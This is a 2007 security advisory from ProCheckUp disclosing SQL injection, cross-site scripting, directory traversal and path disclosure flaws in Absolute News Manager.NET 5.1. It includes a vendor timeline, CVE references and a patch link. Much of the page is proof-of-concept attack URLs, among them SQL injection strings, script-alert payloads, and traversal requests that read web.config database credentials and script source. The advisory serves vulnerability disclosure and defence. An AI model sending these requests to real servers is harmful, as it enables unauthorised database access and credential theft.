procheckup logo
sidebar_boxes_image

Contact Us

Find out more information about ProCheckUp click here.


sidebar_boxes_image

Services

Find out more about ProCheckUp services here.


sidebar_boxes_image

Events

  • PCI DSS User Group meeting

    Neira Jones will be speaking on Barclaycards current approach to PCI and offering advice and guidance to merchants.

Click here to see more events.

Vulnerabilities 2007


PR07-39 Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection


  • Advisory publicly released: Wednesday, 5 December 2007
  • Vulnerability found: Friday, 16 November 2007
  • Vendor informed: Monday, 19 November 2007
  • Vulnerability fixed: Wednesday, 28 November 2007
  • Severity level: High
  • Credits
    Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)
    ProCheckUp thanks Xigla Software for working with us.
  • Description
    Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:
    - unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'
    - unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'
    - XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
    - webroot disclosure on 'getpath.aspx'
  • Proof of concept
  • How to fix
    http://www.xigla.com/security/

    http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip
    Note: ProCheckUp has NOT tested the patch provided by Xigla Software.
  • SQL injection PoCs
    Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx

    Vulnerable parameters: z, pz, ord, sort
    Requesting the following URL returns the version of Windows and SQL server:
    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sor

    t=posted&rmore=-&
    System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL

    Server 2005 - 9.00.3042.00 (Intel X86)
    Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2

    (Build 3790: Service Pack 2) ' to data type int.
    Other URLs:
    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_

    PAYLOAD&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=

    headline&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=

    headline&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1

    em&target=iframe&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED

    _PAYLOAD&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&

    sort=headline&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&

    sort=headline&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&

    sort=headline&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_

    PAYLOAD&featured=n&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=

    posted&featured=n&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted

    INJECTED_PAYLOAD&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_

    PAYLOAD&sort=posted&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=

    n&ord=desc&sort=posted&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=

    posted&featured=n&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=

    only&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=

    n&ord=desc&sort=posted&rmore=-&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_

    PAYLOAD&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort

    =posted&

    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort

    =posted&
    The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed.
    Requesting the following URLs:
    http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999

    http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1
    return the following error:
    System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
  • BID
    26692
  • Consequences
    Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted.
  • XSS PoCs
    Vulnerable script: '/xlaabsolutenm.aspx'

    Unsanitized parameter: 'rmore'
    http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3C

    script%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y
    Vulnerable script: '/pages/default.aspx'

    Unsanitized parameter: 'template'
    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E
  • Webroot PoC
    Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie:
    http://target.tld/[CustomerDefinedDir]/getpath.aspx
    "

    Absolute News Manager Physical Path :

    D:\inetpub\target.tld\[CustomerDefinedDir]\
    Please delete this file from your installation.

    "
  • CVE reference
    CVE-2007-6268 CVE-2007-6269 CVE-2007-6270
    CVE-2007-6271
  • File retrieval PoC
    The following URL shows the contents of .NET 'web.config' (contains DB credentials):

    http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
    The following URL show contents of the vulnerable script:

    http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
    Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename.
    Show content of other scripts:
    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00

    http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
  • References


    Vulnerability_2007.php


    http://www.xigla.com/absolutenmnet/


  • Legal
    Copyright 2007 ProCheckUp Ltd.
    All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.
    Any other use of this information is prohibited.
    ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.